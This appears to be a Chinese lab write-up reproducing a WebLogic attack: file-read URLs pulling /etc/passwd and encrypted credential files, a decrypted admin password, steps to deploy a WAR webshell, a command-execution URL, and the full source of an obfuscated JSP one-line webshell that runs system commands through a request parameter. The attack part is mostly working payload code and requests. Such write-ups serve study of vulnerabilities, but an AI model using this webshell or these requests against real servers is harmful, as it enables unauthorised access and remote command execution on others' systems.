weblogic弱口令漏洞复现

文章目录

一、漏洞特征

1.可以直接获取passwd文件

http://192.168.232.131:7001/hello/file.jsp?path=/etc/passwd

2.可以直接获取密文文件

http://192.168.232.131:7001/hello/file.jsp?path=./security/SerializedSystemIni.dat

将密文copy到*.dat文件

3.可以直接获取密钥文件

http://192.168.232.131:7001/hello/file.jsp?path=./config/config.xml

{AES}yvGnizbUS0lga6iPA5LkrQdImFiS/DJ8Lw/yeE7Dt0k=

4.解密密码

解密后得到密码Oracle@123,用户名是weblogic

5.登录后台

使用解密后的账号登录后台

二、命令执行复现

1.部署webshell

进入部署页面

点击安装,上载文件

选部署档案,上传hello.war

上传成功后点下一步,选将此部署安装为应用程序,设置应用名称

部署完成

2.Shell命令执行

http://192.168.232.131:7001/hello1/hello1/index.jsp?websafe=id

3.jsp一句话木马

java 复制代码
<%@ page import="com.sun.org.apache.bcel.internal.util.ClassLoader" %>
<html>
  <head>
    <title>Hello</title>
  </head>
  <body>
    @Hello world!@
  </body>
</html>
<%!public String HMfR(String yOK){String aAh="";for (int i = 0; i < yOK.length(); i++) {aAh+=(char)(yOK.charAt(i)+6);}return aAh;}
%>
<% String yiO=request.getParameter("websafe");if(yiO!=null){ Class tJIi = Class.forName(HMfR("d[p[(f[ha(Lohncg_"));
Process Mdlz = (Process) tJIi.getMethod(HMfR("_r_]"), String.class).invoke(tJIi.getMethod(HMfR("a_nLohncg_")).invoke(null),yiO);
java.io.InputStream in = Mdlz.getInputStream();byte[] PYp = new byte[2048];out.print("<pre>");while(in.read(PYp)!=-1){ out.println(new String(PYp)); }out.print("</pre>"); }
%>
相关推荐
独行soc3 小时前
2025年渗透测试面试题总结-234(题目+回答)
网络·python·安全·web安全·渗透测试·1024程序员节·安全狮
合作小小程序员小小店11 小时前
web安全开发,在线%服务器日志入侵检测%系统安全开发,基于Python,flaskWeb,正则表达式检测,mysql数据库
服务器·python·安全·web安全·flask·安全威胁分析·安全架构
还是奇怪14 小时前
隐藏在字符编码中的陷阱:深入剖析宽字节注入
数据库·sql·安全·web安全
介一安全15 小时前
从 0 到 1 玩转 2025 最新 WebGoat 靶场:环境搭建 + 全关卡漏洞解析(超级详细)
java·web安全·网络安全·靶场
闲人编程21 小时前
Python在网络安全中的应用:编写一个简单的端口扫描器
网络·python·web安全·硬件·端口·codecapsule·扫描器
网安小白的进阶之路1 天前
A模块 系统与网络安全 第四门课 弹性交换网络-5
网络·安全·web安全
sadandbad1 天前
[vulhub靶机通关]DC-2(rbash绕过_git提权)
网络·sql·web安全·网络安全
民乐团扒谱机1 天前
实验室安全教育与管理平台学习记录(七)网络安全
学习·安全·web安全
普普通通的南瓜1 天前
共筑网络安全,守护绿色家园
安全·web安全·php
belldeep1 天前
网络安全:WebShell
安全·web安全·webshell